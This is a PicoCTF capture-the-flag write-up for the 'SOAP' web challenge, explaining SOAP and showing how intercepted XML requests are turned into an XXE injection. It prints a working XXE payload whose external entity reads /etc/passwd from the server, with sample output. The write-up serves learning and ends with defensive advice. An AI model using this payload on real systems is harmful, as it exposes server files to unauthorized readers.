← Back to Cybersecurity Projects
PicoCTF — Write-Up

SOAP

Category:Web Exploitation
Points:n/a
Author:Kelvin Creighton
Difficulty:Medium
#burpsuite#web#xxe#soap
01

Research

What is SOAP (Simple Object Access Protocol)?

  • A protocol used for exchanging information in web services and computer networks.
  • Allows applications running on different OSs and languages to communicate over HTTP or SMTP.
  • SOAP messages are formatted in XML, making them platform and language independent.

SOAP Message Structure

  • Envelope: Defines the start and end of the message.
  • Header: (Optional) Contains metadata, such as authentication info.
  • Body: Contains the main message or request/response payload.
  • Fault: (Optional) Provides error information.
02

Information Gathering

The goal of the challenge, as described, is to read the `/etc/passwd` file. This points toward a Local File Inclusion (LFI) or XML External Entity (XXE) vulnerability on a Unix/Linux system.

STEP 01Intercepting Traffic

Using Burp Suite to intercept traffic, we observe the outgoing and incoming requests involving an XML payload.

INPUT<?xml version="1.0" encoding="UTF-8"?> <data> <ID>1</ID> </data>
OUTPUT<strong>Special Info:::::</strong> University in Kigali, Rwanda offereing MSECE, MSIT and MS EAI

Reason: The application takes XML input (`ID`), processes it, and reflects content back based on that ID. Since it processes XML without sanitization, it may be vulnerable to XXE (XML External Entity) Injection.

03

Creating the Payload

We can construct an XXE payload to instruct the XML parser to fetch the contents of a local file on the server.

STEP 01Crafting the XXE Payload
INPUT<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ELEMENT data ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data> <ID>&xxe;</ID> </data>
OUTPUTroot:x:0:0:root:/root:/bin/bash ... [Flag Content Displayed]

Reason: `<!DOCTYPE data [...]>` starts the Document Type Definition. `<!ENTITY xxe SYSTEM "file:///etc/passwd">` defines an external entity `xxe` that reads the local `/etc/passwd` file. When the parser expands the `&xxe;` entity inside the `ID` tags, it replaces it with the file contents, exposing the flag.

04

Key Takeaways

  • Always disable external entity processing in XML parsers to prevent XXE vulnerabilities.
  • XML-based protocols like SOAP inherently carry this risk if security features of the parser are not properly configured.
FF

Flag

Captured Flag
[REDACTED]
Kelvin Creighton — PicoCTF Write-UpAll steps performed in a legal CTF environment.